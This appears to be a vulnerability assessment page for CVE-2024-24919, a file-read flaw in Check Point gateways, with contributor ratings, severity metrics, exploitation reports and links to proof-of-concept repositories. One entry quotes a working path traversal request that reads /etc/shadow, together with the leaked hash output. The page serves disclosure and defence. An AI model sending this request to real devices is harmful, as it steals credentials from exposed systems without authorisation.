remmons-r7's assessment of CVE-2024-24919

Description

Potentially allowing an attacker to read certain information on Check Point Security Gateways once connected to the internet and enabled with remote Access VPN or Mobile Access Software Blades. A Security fix that mitigates this vulnerability is available.

Add Assessment

remmons-r7 (45)

May 30, 2024 5:07pm UTC (5 months ago)•

Ratings

Attacker Value

Very High

Exploitability

High

CISA KEV Listed Common in enterprise Easy to weaponize Gives privileged access Unauthenticated

Technical Analysis

On May 28, 2024, Check Point published an advisory for an unauthenticated information disclosure vulnerability affecting Check Point Security Gateway devices configured with either the “IPSec VPN” or “Mobile Access” software blade. This vulnerability was stated as being a vulnerability impacting devices with password-only authentication enabled on some accounts. However, upon analysis, CVE-2024-24919 was discovered to be an unauthenticated arbitrary file read as root. Though attackers may steal credential files to crack account password hashes, CVE-2024-24919 also impacts systems that are not configured for password-only authentication.

This vulnerability should be urgently addressed by anyone running a Check Point Security Gateway with the IPSec VPN or Mobile Access blades enabled. Additionally, organizations should reference the Rapid7 blog post for this vulnerability for remediation and detection recommendations. As of May 30, 2024, CVE-2024-24919 has been added to CISA’s KEV catalog.

SeanWrightFeat (10)

May 30, 2024 9:44pm UTC (5 months ago)•Edited 5 months ago

Ratings

Attacker Value

Very High

Exploitability

Very High

CISA KEV Listed Easy to weaponize Gives privileged access Unauthenticated

Technical Analysis

This is trivial to exploit. The vulnerability at its core is a directory traversal vulnerability that allows for full access to files on the Check Point VPN device/service. It also appears that this an unauthenticated vulnerability and given that these servers will by their very nature be publicly exposed, significantly increases the risk of this vulnerability.

Exploit

The exploit itself, as mentioned above is trivial to exploit. An example is shown on https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/:

Request

POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow

Response

HTTP/1.0 200 OK
Date: Thu, 30 May 2024 01:38:29 GMT
Server: Check Point SVN foundation
Content-Type: text/html
X-UA-Compatible: IE=EmulateIE7
Connection: close
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Length: 505

admin:$6$rounds=10000$N2We3dls$xVq34E9omWI6CJfTXf.4tO51T8Y1zy2K9MzJ9zv.jOjD9wNxG7TBlQ65j992Ovs.jDo1V9zmPzbct5PiR5aJm0:19872:0:99999:8:::
monitor:*:19872:0:99999:8:::
root:*:19872:0:99999:7:::
nobody:*:19872:0:99999:7:::
postfix:*:19872:0:99999:7:::
rpm:!!:19872:0:99999:7:::
shutdown:*:19872:0:99999:7:::
pcap:!!:19872:0:99999:7:::
halt:*:19872:0:99999:7:::
cp_postgres:*:19872:0:99999:7:::
cpep_user:*:19872:0:99999:7:::
vcsa:!!:19872:0:99999:7:::
_nonlocl:*:19872:0:99999:7:::
sshd:*:19872:0:99999:7:::

Using this, an attacker would be able to gain access to sensitive data on the server, such as the configuration for the VPN service.

CVSS V3 Severity and Metrics

Data provided by the National Vulnerability Database (NVD)

Base Score:

8.6 High

Impact Score:

Exploitability Score:

3.9

Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

Attack Vector (AV):

Network

Attack Complexity (AC):

Low

Privileges Required (PR):

None

User Interaction (UI):

None

Scope (S):

Changed

Confidentiality (C):

High

Integrity (I):

None

Availability (A):

None

Vendors

checkpoint

Products

cloudguard network security r80.40,
cloudguard network security r81.0,
cloudguard network security r81.10,
cloudguard network security r81.20,
quantum security gateway firmware r80.40,
quantum security gateway firmware r81.0,
quantum security gateway firmware r81.10,
quantum security gateway firmware r81.20,
quantum spark firmware r80.20,
quantum spark firmware r81.10

Exploited in the Wild

Reported by:

remmons-r7 indicated source as Government or Industry Alert (https://www.cisa.gov/known-exploited-vulnerabilities-catalog)

Reported: May 30, 2024 5:07pm UTC (5 months ago) • Edited 5 months ago

danielxmnn indicated source as News Article or Blog

Reported: May 30, 2024 5:30pm UTC (5 months ago)

SeanWrightFeat indicated source as Government or Industry Alert (https://www.cisa.gov/known-exploited-vulnerabilities-catalog?search_api_fulltext=CVE-2024-24919)

Reported: May 30, 2024 9:44pm UTC (5 months ago)

3dcyber indicated source as Personally observed in an environment

Reported: June 04, 2024 8:51am UTC (5 months ago)

ccondon-r7 indicated source as Other: Rapid7 MDR has seen successful exploitation of this vulnerability in customer environments

Reported: June 06, 2024 2:29pm UTC (5 months ago) • Edited 1 month ago

inokii indicated sources as

Vendor Advisory (https://support.checkpoint.com/results/sk/sk182336)
Government or Industry Alert (https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
Other: CISA Gov Alert (https://www.cisa.gov/news-events/alerts/2024/05/30/cisa-adds-two-known-exploited-vulnerabilities-catalog)

Reported: June 06, 2024 3:57pm UTC (5 months ago)

cwyre-r7 indicated source as Other: Rapid7 MDR has observed successful exploitation of this vulnerability in customer environments

Reported: October 15, 2024 9:24pm UTC (1 month ago)

AttackerKB Worker indicated source as Government or Industry Alert (https://www.cisa.gov/news-events/alerts/2024/05/30/cisa-adds-two-known-exploited-vulnerabilities-catalog)

Reported: November 08, 2024 8:12am UTC (1 week ago)

References

Canonical

CVE-2024-24919 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24919)

Exploit

PoCs that have not been added by contributors directly have been sourced from: nomi-sec/PoC-in-GitHub.
A PoC added here by the AKB Worker must have at least 2 GitHub stars.

CVE-2024-24919 (https://github.com/emanueldosreis/CVE-2024-24919) (Added by AKB Worker)

CVE-2024-24919 (https://github.com/LucasKatashi/CVE-2024-24919) (Added by AKB Worker)

CVE-2024-24919 (https://github.com/Bytenull00/CVE-2024-24919) (Added by AKB Worker)

CVE-2024-24919-Bulk-Scanner (https://github.com/ifconfig-me/CVE-2024-24919-Bulk-Scanner) (Added by AKB Worker)

CVE-2024-24919-Sniper (https://github.com/bigb0x/CVE-2024-24919-Sniper) (Added by AKB Worker)

CVE-2024-24919-Exploit-PoC-Checkpoint-Firewall-VPN (https://github.com/r4p3c4/CVE-2024-24919-Exploit-PoC-Checkpoint-Firewall-VPN) (Added by AKB Worker)

CVE-2024-24919 (https://github.com/GuayoyoCyber/CVE-2024-24919) (Added by AKB Worker)

CVE-2024-24919 (https://github.com/geniuszlyy/CVE-2024-24919) (Added by AKB Worker)